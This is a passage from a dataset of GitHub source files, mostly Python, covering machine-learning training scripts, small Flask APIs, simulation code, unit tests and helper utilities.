100\nA[0,70:80]= -100\nA[-1,115:120]= -100\n\n\n# Display it\np = plt.imshow(A, interpolation='nearest')\nplt.set_cmap('OrRd')\nplt.pause(2)\n\n\nfor t in range(2000):\n Aold= np.copy(A)\n for i in range(1,127):\n for j in range(1,127):\n A[i,j]= 0.9*Aold[i,j] + 0.1 * \\\n ( Aold[i+1,j-1] + Aold[i+1,j] + Aold[i+1,j+1] +\n Aold[i ,j-1] + Aold[i ,j+1] +\n Aold[i-1,j-1] + Aold[i-1,j] + Aold[i-1,j+1] )/8.0\n for i in range(127):\n A[i,0] = A[i,1]\n A[i,-1] = A[i,-2]\n A[0,i] = A[1,i]\n A[-1,i] = A[-2,i]\n\n for i in range(30,100):\n A[i,0]= 100\n\n for i in range(115,120):\n A[-1,i]= -100\n\n for i in range(70,80):\n A[0,i]= -100\n \n p.set_data(A)\n plt.pause(.01)\n","repo_name":"att10/CreativeDynamics","sub_path":"pythonprojects/heat.py","file_name":"heat.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18223939621","text":"from torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom pathlib import Path\nfrom PIL import Image\nfrom glob import glob\n\n\nclass ImageNet(Dataset):\n # https://www.kaggle.com/competitions/imagenet-object-localization-challenge/data\n # Downloading LOC_synset_mapping.txt file from the URL above\n # for getting synset and label name mapping\n\n def __init__(self, root_path: str, label_path: str, mode: str = \"train\"):\n assert mode in [\"train\", \"val\"], \"mode must be either train or val\"\n folder_path = f\"{root_path}/{mode}\"\n self.image_list = glob(f\"{folder_path}/n*/*\")\n self.transformer = transforms.Compose(\n [\n transforms.RandAugment(num_ops=2, magnitude=15),\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ]\n )\n self._get_labels(label_path)\n\n def _get_labels(self, label_path: str) -> dict:\n synset_mapper = {}\n label_mapper = {}\n with open(label_path, \"r\") as fileLink:\n rows = fileLink.readlines()\n for target_id, row in enumerate(rows):\n row = row.replace(\"\\n\", \"\")\n collection = row.split(\" \")\n synset_id = collection[0]\n name = \" \".join(collection[1:])\n synset_mapper[synset_id] = name\n label_mapper[name] = target_id\n\n self.synset_mapper = synset_mapper\n self.label_mapper = label_mapper\n\n def __len__(self) -> int:\n return len(self.image_list)\n\n def __getitem__(self, index: int) -> dict:\n image_path = self.image_list[index]\n image = Image.open(image_path).convert(\"RGB\")\n image = self.transformer(image)\n synset_id = Path(image_path).parent.name\n label = self.synset_mapper[synset_id]\n target_id = self.label_mapper[label]\n\n return {\"features\": image, \"targets\": target_id, \"labels\": label}\n","repo_name":"avalonliberty/ResNet-RS","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18357037947","text":"from ftw.inflator.customization import InflatorCustomization\nfrom ftw.inflator.interfaces import IInflatorCustomization\nfrom unittest import TestCase\nfrom zope.interface.verify import verifyClass\n\n\nclass TestCustomizationUtility(TestCase):\n\n def test_customization_implements_interface(self):\n self.assertTrue(IInflatorCustomization.implementedBy(InflatorCustomization))\n verifyClass(IInflatorCustomization, InflatorCustomization)\n\n def test_stores_arguments(self):\n obj = InflatorCustomization(product=u'foo',\n image='++resource++bar.jpg',\n order=7)\n\n self.assertEqual(obj.product, u'foo')\n self.assertEqual(obj.image, '++resource++bar.jpg')\n self.assertEqual(obj.order, 7)\n\n def test_defaults(self):\n obj = InflatorCustomization()\n\n self.assertEqual(obj.product, None)\n self.assertEqual(obj.image, None)\n self.assertEqual(obj.order, 10)\n","repo_name":"4teamwork/ftw.inflator","sub_path":"ftw/inflator/tests/test_customization_utility.py","file_name":"test_customization_utility.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"22686875576","text":"# April 2023, Ana Margarida Ferro\r\n\r\ndef get_sec(time_str):\r\n \"\"\"Get seconds from time.\"\"\"\r\n m, s = time_str.split(':')\r\n return int(m) * 60 + int(s)\r\n\r\ndef organize_videos_details(header,ts):\r\n list = []\r\n ts_list = []\r\n with open(header, 'r') as f:\r\n i = 1\r\n for row in f:\r\n # row variable is a list that represents a row in csv\r\n row = row.strip('\\n')\r\n if(i<139):\r\n if i < 10:\r\n row += \",p_00\" + str(i) + ',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n elif(i<100 and i>=10):\r\n row += \",p_0\" + str(i) +',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n else:\r\n row += \",p_\" + str(i) + ',' # , to process in the sh file everything well\r\n i += 1\r\n list.append(row)\r\n f.close()\r\n\r\n with open(ts, 'r') as g:\r\n for row in g:\r\n #row = row.strip('\\n')\r\n #row = row.replace(\"-\",\",\")\r\n #row += ','\r\n\r\n #Get the duration of each video\r\n #timestamp = row.split(\",\")\r\n #ti = get_sec(timestamp[0])\r\n #tf = get_sec(timestamp[1])\r\n #totalsec = tf-ti\r\n #row+=str(totalsec)\r\n\r\n ts_list.append(row)\r\n g.close()\r\n\r\n for index in range(len(list)):\r\n line1 = list[index].strip('\\n')\r\n line2 = ts_list[index].strip('\\n')\r\n line = line1 + line2\r\n print(line)\r\n\r\n\r\nif __name__ == '__main__':\r\n organize_videos_details('../videos_PD_test.csv','../times_stamps.csv')\r\n","repo_name":"amargaridaferro/PD-Detection-Based-Visual-Spech","sub_path":"scriptsToGetStatisticalData/change_config_videos.py","file_name":"change_config_videos.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13805531048","text":"try:\n from app.core.ModelPreProcess import ModelPreProcess\n from app.core.OLSRegressor import OLSRegressor \nexcept: # to avoid exception when runing localy and service\n from ModelPreProcess import ModelPreProcess\n from OLSRegressor import OLSRegressor \n \nimport json\n\nclass Train:\n \n def __init__(self, mode=\"\", TRAIN_FILE=\"\"):\n self.mode = mode\n self.shp = ModelPreProcess()\n self.ols = OLSRegressor()\n \n self.TRAIN_FILE = TRAIN_FILE\n\n def train(self): \n \n temp_mode = self.mode\n if temp_mode == \"\":\n temp_mode = \"complete\"\n \n APP_PATH = \"app/core/\" \n \n train_df = self.shp.load_csv(self.TRAIN_FILE)\n \n # Shuffle and Split the train_df\n train_df = self.shp.shuffle_dataframe(train_df) \n train_df, test_df = self.shp.split_dataframe( train_df, (len(train_df.index)*80)//100 )\n self.shp.dataframe_to_csv(train_df, self.TRAIN_FILE[:-4] + \"_Train.csv\", train_df.columns)\n self.shp.dataframe_to_csv(test_df, self.TRAIN_FILE[:-4] + \"_Test.csv\", train_df.columns)\n \n try:\n with open('config/'+temp_mode+'.json') as f:\n data = json.load(f)\n except:\n with open('app/core/config/'+temp_mode+'.json') as f:\n data = json.load(f)\n \n cols, encoder_data = data['cols'], data['encoder_data']\n \n X, y = self.shp.getXandY(train_df, cols, encoder_data)\n \n model = self.ols.fit(X, y) \n \n # if TRAIN_FILE name contains 'app/core/' in the\n # beginning (because of service call) then remove it before saving\n if self.TRAIN_FILE.startswith(APP_PATH):\n self.TRAIN_FILE = self.TRAIN_FILE[len(APP_PATH):]\n \n try:\n self.ols.save_data(model, APP_PATH + 'models/' + self.mode +'/pickledModel.pkl') \n self.ols.save_data(len(X), APP_PATH + 'models/' + self.mode +'/pickledTrainingLength.pkl') \n self.ols.save_data(self.TRAIN_FILE[:-4] + \"_Train.csv\", APP_PATH + 'models/' + self.mode +'/pickledTrainFileName.pkl')\n except: # to avoid exception when runing localy and service\n self.ols.save_data(model, 'models/'+self.mode + '/pickledModel.pkl') \n self.ols.save_data(len(X), 'models/'+self.mode +'/pickledTrainingLength.pkl') \n self.ols.save_data(self.TRAIN_FILE[:-4] + \"_Train.csv\", 'models/'+self.mode + '/pickledTrainFileName.pkl')\n \n return self.ols.getRsquared(model)\n \n\"\"\"\n if needs to be trained locally from this file only, uncomment the following lines:\n \n# For Month\nt = Train(mode=\"month\", TRAIN_FILE=\"datasets/Data11k_m.csv\")\nt.train()\n \n# For weight\nt = Train(mode=\"weight\", TRAIN_FILE=\"datasets/Data11k_w.csv\")\nt.train()\n \n# For complete\nt = Train(mode=\"\", TRAIN_FILE=\"datasets/Data11k.csv\")\nt.train()\n\n# For delwin\nt = Train(mode=\"delwin\", TRAIN_FILE=\"datasets/delwin_6k.csv\")\nt.train()\n\n\"\"\"","repo_name":"learningdesai/ml-app","sub_path":"app/core/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39938695531","text":"import time\nimport argparse\n\nfrom scienceworld import ScienceWorldEnv\n\n\ndef userConsole(args):\n \"\"\" Example user input console, to play through a game. \"\"\"\n exitCommands = [\"quit\", \"exit\"]\n\n taskIdx = args['task_num']\n simplificationStr = args['simplification_str']\n\n # Initialize environment\n env = ScienceWorldEnv(\"\", args['jar_path'], envStepLimit = args['env_step_limit'])\n taskNames = env.getTaskNames()\n print(\"Task Names: \" + str(taskNames))\n\n # Choose task\n taskName = taskNames[taskIdx]\n env.load(taskName, args['var_num'], simplificationStr, generateGoldPath=True)\n print(\"Starting Task \" + str(taskIdx) + \": \" + taskName)\n time.sleep(2)\n\n\n # Reset the environment\n initialObs, initialDict = env.reset()\n\n\n\n #\n # Examples of how to access much of the environment information that the API exposes.\n # (Many of these are similar to the Jericho API)\n #\n print(\"Task Names: \" + str(taskNames))\n print(\"Possible actions: \" + str(env.getPossibleActions()) )\n print(\"Possible objects: \" + str(env.getPossibleObjects()) )\n templates, lut = env.getPossibleActionObjectCombinations()\n print(\"Possible action/object combinations: \" + str(templates))\n #print(\"Object IDX to Object Referent LUT: \" + str(lut))\n print(\"Vocabulary: \" + str(env.getVocabulary()) )\n print(\"Possible actions (with IDs): \" + str(env.getPossibleActionsWithIDs()))\n print(\"Possible object types: \" + str(env.getObjectTypes()))\n print(\"Object IDX to Object Referent LUT: \" + str(lut))\n print(\"\\n\")\n print(\"Possible object referents LUT: \" + str(env.getPossibleObjectReferentLUT()))\n print(\"\\n\")\n print(\"Valid action-object combinations: \" + str(env.getValidActionObjectCombinations()))\n print(\"\\n\")\n print(\"Object_ids to type_ids: \" + str(env.getAllObjectTypesLUTJSON()))\n print(\"\\n\")\n print(\"All objects, their ids, types, and referents: \" + str(env.getAllObjectIdsTypesReferentsLUTJSON() ))\n print(\"\\n\")\n print(\"Valid action-object combinations (with templates): \" + str(env.getValidActionObjectCombinationsWithTemplates() ))\n print(\"\\n\")\n print(\"Object Type LUT: \" + str(env.getPossibleObjectReferentTypesLUT()))\n print(\"Variations (train): \" + str(env.getVariationsTrain() ))\n\n print(\"\")\n print(\"----------------------------------------------------------------------------------\")\n print(\"\")\n\n\n print(\"Gold Path:\" + str(env.getGoldActionSequence()))\n\n print(\"Task Name: \" + taskName)\n print(\"Variation: \" + str(args['var_num']) + \" / \" + str(env.getMaxVariations(taskName)))\n print(\"Task Description: \" + str(env.getTaskDescription()) )\n\n #\n # Main user input loop\n #\n userInputStr = \"look around\" # First action\n while (userInputStr not in exitCommands):\n if (userInputStr == \"help\"):\n print(\"Possible actions: \")\n for actionStr in env.getPossibleActions():\n print(\"\\t\" + str(actionStr))\n\n elif (userInputStr == \"objects\"):\n print(\"Possible objects (one referent listed per object): \")\n for actionStr in env.getPossibleObjects():\n print(\"\\t\" + str(actionStr))\n\n elif (userInputStr == \"valid\"):\n print(\"Valid action-object combinations:\")\n print(env.getValidActionObjectCombinationsWithTemplates())\n\n elif (userInputStr == 'goals'):\n print(env.getGoalProgressStr())\n\n else:\n # Send user input, get response\n observation, reward, isCompleted, info = env.step(userInputStr)\n score = info['score']\n print(\"\\n\" + observation)\n print(\"Reward: \" + str(reward))\n print(\"Score: \" + str(score))\n print(\"isCompleted: \" + str(isCompleted))\n #print(\"info: \" + str(info))\n\n print(\"'help' lists valid action templates, 'objects' lists valid objects, 'valid' lists valid action-object combinations (long!). \")\n print(\"'goals' lists progress on subgoals.\")\n print(\"type 'exit' to quit.\")\n\n # Get user input\n userInputStr = input('> ')\n # Sanitize input\n userInputStr = userInputStr.lower().strip()\n\n\n # Display run history\n runHistory = env.getRunHistory()\n print(\"Run History:\")\n print(runHistory)\n for item in runHistory:\n print(item)\n print(\"\")\n\n # Display subgoal progress\n print(env.getGoalProgressStr())\n\n print(\"Completed.\")\n\n\ndef build_simplification_str(args):\n \"\"\" Build simplification_str from args. \"\"\"\n simplifications = list()\n if args[\"teleport\"]:\n simplifications.append(\"teleportAction\")\n\n if args[\"self_watering_plants\"]:\n simplifications.append(\"selfWateringFlowerPots\")\n\n if args[\"open_containers\"]:\n simplifications.append(\"openContainers\")\n\n if args[\"open_doors\"]:\n simplifications.append(\"openDoors\")\n\n if args[\"no_electrical\"]:\n simplifications.append(\"noElectricalAction\")\n\n return args[\"simplifications_preset\"] or \",\".join(simplifications)\n\n#\n# Parse command line arguments\n#\ndef parse_args():\n desc = \"Play through a game using the console.\"\n parser = argparse.ArgumentParser(desc)\n parser.add_argument(\"--jar_path\", type=str,\n help=\"Path to the ScienceWorld jar file. Default: use builtin.\")\n parser.add_argument(\"--task-num\", type=int, default=13,\n help=\"Specify the task number to play. Default: %(default)s\")\n parser.add_argument(\"--var-num\", type=int, default=0,\n help=\"Specify the task variation number to play. Default: %(default)s\")\n parser.add_argument(\"--env-step-limit\", type=int, default=100,\n help=\"Maximum number of steps per episode. Default: %(default)s\")\n parser.add_argument(\"--num-episodes\", type=int, default=5,\n help=\"Number of episodes to play. Default: %(default)s\")\n\n simplification_group = parser.add_argument_group('Game simplifications')\n simplification_group.add_argument(\"--simplifications-preset\", choices=['easy'],\n help=\"Choose a preset among: 'easy' (apply all possible simplifications).\")\n simplification_group.add_argument(\"--teleport\", action=\"store_true\",\n help=\"Lets agents instantly move to any location.\")\n simplification_group.add_argument(\"--self-watering-plants\", action=\"store_true\",\n help=\"Plants do not have to be frequently watered.\")\n simplification_group.add_argument(\"--open-containers\", action=\"store_true\",\n help=\"All containers are opened by default.\")\n simplification_group.add_argument(\"--open-doors\", action=\"store_true\",\n help=\"All doors are opened by default.\")\n simplification_group.add_argument(\"--no-electrical\", action=\"store_true\",\n help=\"Remove the electrical actions (reduces the size of the action space).\")\n\n args = parser.parse_args()\n params = vars(args)\n return params\n\n\ndef main():\n print(\"ScienceWorld 1.0 API Examples - Human\")\n\n # Parse command line arguments\n args = parse_args()\n args[\"simplification_str\"] = build_simplification_str(args)\n userConsole(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"allenai/ScienceWorld","sub_path":"examples/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"72"} +{"seq_id":"17418047721","text":"import os\nimport tensorflow as tf\nimport numpy as np\nos.environ['CUDA_VISIBLE_DEVICES'] = '0, 1, 2'\n\n\"\"\"\ntrain the dataset from scratch\n\"\"\"\n# Image Parameters\nN_CLASSES = 2 # CHANGE HERE, total number of classes\nIMG_HEIGHT = 224 # CHANGE HERE, the image height to be resized to\nIMG_WIDTH = 224 # CHANGE HERE, the image width to be resized to\nCHANNELS = 3 # The 3 color channels, change to 1 if grayscale\nn_classes = N_CLASSES # MNIST total classes (0-9 digits)\ndropout = 0.15\nnum_steps = 5000\ntrain_display = 100\nval_display = 1000\nlearning_rate = 1e-5\nBATCHSIZE = 32\nsave_check = 1000\n\n\ndef _parse_function(record):\n keys_to_features = {\n 'img_raw': tf.FixedLenFeature((), tf.string),\n 'label': tf.FixedLenFeature((), tf.int64)\n }\n parsed = tf.parse_single_example(record, keys_to_features)\n image = tf.decode_raw(parsed['img_raw'], tf.uint8)\n image = tf.reshape(image, [IMG_HEIGHT, IMG_WIDTH, 3])\n image = tf.cast(image, tf.float32)\n image = image/225.0\n image = image - 0.5\n image = image * 2.0\n label = tf.cast(parsed['label'], tf.int32)\n return image, label\n\n\n# train data pipline\n# repeat -> shuffle 和 shuffle -> repeat不一样\ntraindata = tf.data.TFRecordDataset(\"../datasets/dog_cat/train_dog_cat_224.tfrecord\").\\\n map(_parse_function).\\\n shuffle(buffer_size=2000, reshuffle_each_iteration=True).\\\n batch(BATCHSIZE).\\\n repeat().\\\n prefetch(BATCHSIZE)\n\n# val data pipline\nvaldata = tf.data.TFRecordDataset(\"../datasets/dog_cat/test_dog_cat_224.tfrecord\").\\\n map(_parse_function).\\\n batch(BATCHSIZE).\\\n repeat().\\\n prefetch(BATCHSIZE)\n# Create an iterator over the dataset\n\nis_training = tf.placeholder(tf.bool)\niterator = tf.data.Iterator.from_structure(traindata.output_types, traindata.output_shapes)\nX, Y = iterator.get_next()\n\ntraindata_init = iterator.make_initializer(traindata)\nvaldata_init = iterator.make_initializer(valdata)\n\n\ndef check_accuracy(sess, correct_prediction, dataset_init_op, batches_to_check):\n # Initialize the validation dataset\n sess.run(dataset_init_op)\n num_correct, num_samples = 0, 0\n for i in range(batches_to_check):\n try:\n correct_pred = sess.run(correct_prediction, {is_training: False})\n num_correct += correct_pred.sum()\n num_samples += correct_pred.shape[0]\n except tf.errors.OutOfRangeError:\n break\n\n # Return the fraction of datapoints that were correctly classified\n acc = float(num_correct) / num_samples\n return acc\n\n\n# Define the newwork\ndef conv_net(x, n_classes, dropout, reuse, is_training=is_training):\n # Define a scope for reusing the variables\n with tf.variable_scope('ConvNet', reuse=reuse):\n # Convolution Layer with 32 filters and a kernel size of 5\n # x = tf.reshape(x, shape=[-1, 64, 64, 3])\n conv1 = tf.layers.conv2d(x, 64, 3, padding='same', activation=tf.nn.relu)\n conv1_1 = tf.layers.conv2d(conv1, 64, 3, padding='same', activation=tf.nn.relu)\n pool1 = tf.layers.max_pooling2d(conv1_1, 2, 2)\n\n conv2_1 = tf.layers.conv2d(pool1, 128, 3, padding='same', activation=tf.nn.relu)\n conv2_2 = tf.layers.conv2d(conv2_1, 128, 3, padding='same', activation=tf.nn.relu)\n pool2 = tf.layers.max_pooling2d(conv2_2, 2, 2)\n\n conv3_1 = tf.layers.conv2d(pool2, 256, 3, padding='same', activation=tf.nn.relu)\n conv3_2 = tf.layers.conv2d(conv3_1, 256, 3, padding='same', activation=tf.nn.relu)\n conv3_3 = tf.layers.conv2d(conv3_2, 256, 3, padding='same', activation=tf.nn.relu)\n pool3 = tf.layers.max_pooling2d(conv3_3, 2, 2)\n\n conv4_1 = tf.layers.conv2d(pool3, 512, 3, padding='same', activation=tf.nn.relu)\n conv4_2 = tf.layers.conv2d(conv4_1, 512, 3, padding='same', activation=tf.nn.relu)\n conv4_3 = tf.layers.conv2d(conv4_2, 512, 3, padding='same', activation=tf.nn.relu)\n pool4 = tf.layers.max_pooling2d(conv4_3, 2, 2)\n\n conv5_1 = tf.layers.conv2d(pool4, 512, 3, padding='same', activation=tf.nn.relu)\n conv5_2 = tf.layers.conv2d(conv5_1, 512, 3, padding='same', activation=tf.nn.relu)\n conv5_3 = tf.layers.conv2d(conv5_2, 512, 3, padding='same', activation=tf.nn.relu)\n pool5 = tf.layers.max_pooling2d(conv5_3, 2, 2)\n fc1 = tf.contrib.layers.flatten(pool5)\n\n # Fully connected layer (in contrib folder for now)\n fc1 = tf.layers.dense(fc1, 4096)\n fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n fc1 = tf.layers.dense(fc1, 4096)\n fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n out = tf.layers.dense(fc1, n_classes)\n return out\n\n\n# Create a graph for training\nlogits_train = conv_net(X, N_CLASSES, dropout=0.5, reuse=False, is_training=True)\n# Create another graph for testing that reuse the same weights, 注意测试的时候不丢弃网络\nlogits_test = conv_net(X, N_CLASSES, dropout=0.0, reuse=True, is_training=False)\n\n# Define loss and optimizer (with train logits, for dropout to take effect)\nloss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits_train, labels=Y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntrain_op = optimizer.minimize(loss_op)\n\n# Evaluate model (with test logits, for dropout to be disabled)\nlogits_test = tf.nn.softmax(logits_test)\ncorrect_pred = tf.equal(tf.argmax(logits_test, 1), tf.cast(Y, tf.int64))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# Initialize the variables (i.e. assign their default value)\ninit = tf.global_variables_initializer()\n\n# Start training\n# Initialize the iterator\nwith tf.Session() as sess:\n # sess.run(iterator.initializer)\n sess.run(init)\n sess.run(traindata_init)\n saver = tf.train.Saver(max_to_keep=3)\n ckpt = tf.train.get_checkpoint_state('./model_vgg')\n if ckpt is None:\n print(\"Model not found, please train your model first...\")\n else:\n path = ckpt.model_checkpoint_path\n print('loading pre-trained model from %s.....' % path)\n saver.restore(sess, path)\n # Training cycle\n for step in range(1, num_steps + 1):\n loss, acc, _ = sess.run([loss_op, accuracy, train_op], {is_training: True})\n if step % train_display == 0 or step == 1:\n # Run optimization and calculate batch loss and accuracy\n print(\"Step \" + str(step) + \", Minibatch Loss= \" + \"{:.4f}\".format(loss) + \", Training Accuracy= \" +\n \"{:.3f}\".format(acc))\n\n if step % val_display == 0 and step is not 0:\n sess.run(valdata_init)\n avg_acc = 0\n acc = check_accuracy(sess, correct_pred, valdata_init, val_display)\n loss = sess.run(loss_op, {is_training: False})\n print(\"\\033[1;36m=\\033[0m\"*60)\n print(\"\\033[1;36mStep %d, Minibatch Loss= %.4f, Test Accuracy= %.4f\\033[0m\" % (step, loss, acc))\n print(\"\\033[1;36m=\\033[0m\"*60)\n\n if step % 1000 == 0:\n path_name = \"./model_vgg/model\" + str(step) + \".ckpt\"\n print(path_name)\n saver.save(sess, path_name)\n print(\"model has been saved\")\n\n print(\"Optimization Finished!\")\n","repo_name":"bruce1408/Tensorflow_learning","sub_path":"week06/src/6_15_VGG_train.py","file_name":"6_15_VGG_train.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"42231549394","text":"#!/usr/bin/python3\n\n\ndef add_tuple(tuple_a=(), tuple_b=()):\n # add two tuples values'\n newt1 = (0, 0)\n newt2 = (0, 0)\n\n # check len & value of t_a\n if len(tuple_a) == 1:\n newt1 = (tuple_a[0], 0)\n elif len(tuple_a) >= 2:\n newt1 = (tuple_a[0], tuple_a[1])\n\n # check len & value of t_b\n if len(tuple_b) == 1:\n newt2 = (tuple_b[0], 0)\n elif len(tuple_b) >= 2:\n newt2 = (tuple_b[0], tuple_b[1])\n\n # return new tuple\n return (newt1[0] + newt2[0], newt1[1] + newt2[1])\n","repo_name":"conkobar/holbertonschool-higher_level_programming","sub_path":"0x02-python-data_structures/7-add_tuple.py","file_name":"7-add_tuple.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35129354818","text":"\nfrom flask import Flask\napp = Flask(__name__)\nfrom flask import jsonify\nimport requests\n\n\n@app.route('/buy')\ndef buy():\n r = requests.get('https://api.exchangeratesapi.io/latest')\n json = r.json()\n rates_object = json['rates']\n buy_rates = {}\n for key,value in rates_object.items():\n cost = value / 100 * 2\n buy_rates[key] = round(value + cost, 5) \n return jsonify(buy_rates)\n\n@app.route('/sell')\ndef sell():\n r = requests.get('https://api.exchangeratesapi.io/latest')\n json = r.json()\n rates_object = json['rates']\n sell_rates = {}\n for key,value in rates_object.items():\n cost = value / 100 * 2\n sell_rates[key] = round(value - cost, 5) \n return jsonify(sell_rates)\n \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"IvanPetrushevski/exchange-rates-api","sub_path":"hello_flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72484535272","text":"import glob, os, chemistry\nimport networkx\nimport mdtraj as md\n\nfilenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/*.prmtop\")\n#filenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/57-55-6_1000_313.2*.prmtop\")\nfilenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/121182*.prmtop\")\n#filenames = glob.glob(\"/home/kyleb/lb_benchmark_openmoltools/tleap/126492-54-4_1000_315*.prmtop\")\n\nfor filename in filenames:\n base = os.path.splitext(os.path.split(filename)[-1])[0]\n prmtop_filename = \"/home/kyleb/lb_benchmark_openmoltools/tleap/\" + base + \".prmtop\"\n inpcrd_filename = \"/home/kyleb/lb_benchmark_openmoltools/tleap/\" + base + \".inpcrd\"\n print(prmtop_filename, inpcrd_filename)\n prmtop0 = chemistry.load_file(prmtop_filename)\n t0 = md.load(inpcrd_filename, top=prmtop_filename)\n t0 = t0.atom_slice(t0.top.select(\"resSeq 0\"))\n prmtop_filename = \"/home/kyleb/liquid_benchmark_3_14//tleap/\" + base + \".prmtop\"\n inpcrd_filename = \"/home/kyleb/liquid_benchmark_3_14//tleap/\" + base + \".inpcrd\"\n prmtop1 = chemistry.load_file(prmtop_filename)\n t1 = md.load(inpcrd_filename, top=prmtop_filename)\n t1 = t1.atom_slice(t1.top.select(\"resSeq 0\"))\n top0 = prmtop0.to_dataframe()\n top0 = top0[top0.resid == 0]\n top1 = prmtop1.to_dataframe()\n top1 = top1[top1.resid == 0]\n b0 = t0.top.to_dataframe()[1]\n b1 = t1.top.to_dataframe()[1]\n g0 = networkx.from_edgelist(b0)\n g1 = networkx.from_edgelist(b1)\n for i in range(len(g0.nodes())):\n node = g0.node[i]\n node[\"charge\"] = top0.charge[i]\n node[\"gafftype\"] = top0.type[i] \n for i in range(len(g1.nodes())):\n node = g1.node[i]\n node[\"charge\"] = top1.charge[i]\n node[\"gafftype\"] = top1.type[i]\n epsilon = 1E-1\n node_match = lambda x, y: (x[\"gafftype\"] == y[\"gafftype\"]) and (abs(x[\"charge\"] - y[\"charge\"]) < epsilon)\n matcher = networkx.isomorphism.GraphMatcher(g0, g1, node_match=node_match)\n matcher.is_isomorphic()\n mapping = matcher.mapping\n mapping\n inv_mapping = {val:key for key, val in mapping.items()}\n\n top1[\"newind\"] = top1.index.map(lambda x: inv_mapping[x])\n remapped = top1.set_index(\"newind\").sort_index()\n remapped[\"top0\"] = top0[\"charge\"]\n remapped[\"delta\"] = remapped.charge - remapped.top0\n print(remapped.delta.mean(), remapped.delta.std(), remapped.delta.max(), remapped.delta.min())\n\n\ntop0[[\"name\", \"type\", \"charge\"]]\nremapped[[\"name\", \"type\", \"charge\", \"top0\", \"delta\"]]\n","repo_name":"choderalab/LiquidBenchmark","sub_path":"src/misc/old/test_charges_after_gaff2xml_patch.py","file_name":"test_charges_after_gaff2xml_patch.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42385812648","text":"\"\"\"\nTest some jax functionality\n\"\"\"\n\nimport jax\nimport jax.numpy as jnp\nimport pytest\nfrom jax import random\n\n\ndef test_jax_cpu():\n \"\"\"Test wether jax can run on the cpu by executing some jax code\"\"\"\n jax.default_device = jax.devices(\"cpu\")[0]\n do_matrix_multiplication()\n\n\n@pytest.mark.xfail(\n jax.default_backend()\n == \"cpu\", # Jax uses gpu per default if available. So when can check wether gpu is available by checking for the default\n reason=\"XFAIL means that no GPU was visible to jax or the matrix multiplication failed, maybe jax[cuda] or cuda + cudnn not installed\",\n)\ndef test_jax_gpu():\n \"\"\"Test wether jax can run on the gpu by executing some jax code.\n The jax gpu test may fail if no nvidia gpu is available or the cuda and cudnn libraries are not installed.\n\n Args:\n\n Returns:\n\n \"\"\"\n jax.default_device = jax.devices(\"gpu\")[0]\n do_matrix_multiplication()\n\n\n# The random part would be different if using numpy\ndef do_matrix_multiplication(n: int = 20):\n \"\"\"Do a simple matrix-matrix multiplication for two random matrices generated by numpy\n\n Args:\n n(int, optional): number of entries per dimension, defaults to 20\n\n Returns:\n\n \"\"\"\n key = random.PRNGKey(\n 0\n ) # Not really random ;) [0,0] But gives reproducible results\n keyx, keyy = random.split(key)\n xj = random.normal(keyx, (n, n))\n yj = random.normal(keyy, (n, n))\n\n zj = jnp.dot(xj, yj)\n","repo_name":"Systems-Theory-in-Systems-Biology/EPI","sub_path":"tests/test_jax.py","file_name":"test_jax.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"72"} +{"seq_id":"24961370020","text":"from flask import Blueprint,request\nfrom database.post_service import get_all_posts_db,get_exact_post_db,delete_exact_post_db,change_post_text_db, add_new_post_db,post_new_photo_db,create_post_for_hashtag\npost_bp = Blueprint('user_post',__name__,url_prefix='/post')\n\n# get all posts\n@post_bp.route('/',methods=['GET'])\ndef get_all_user_posts():\n all_posts = get_all_posts_db()\n\n if all_posts:\n return {'status':1,'message':all_posts}\n return {'status':0, 'message':'Not found'}\n\n#get define post\n@post_bp.route('/',methods=['GET'])\ndef get_exact_post(post_id : int):\n exact_post = get_exact_post_db(post_id)\n\n if exact_post:\n return {'status':1,'message':exact_post}\n return {'status':0,'message':'Not found'}\n\n#change user's post\n@post_bp.route('/',methods=['PUT'])\ndef change_user_post(post_id : int):\n new_post_text = request.json.get('new_post_text')\n\n change_post_text_db(post_id,new_post_text)\n\n return {'status': 1, 'message': 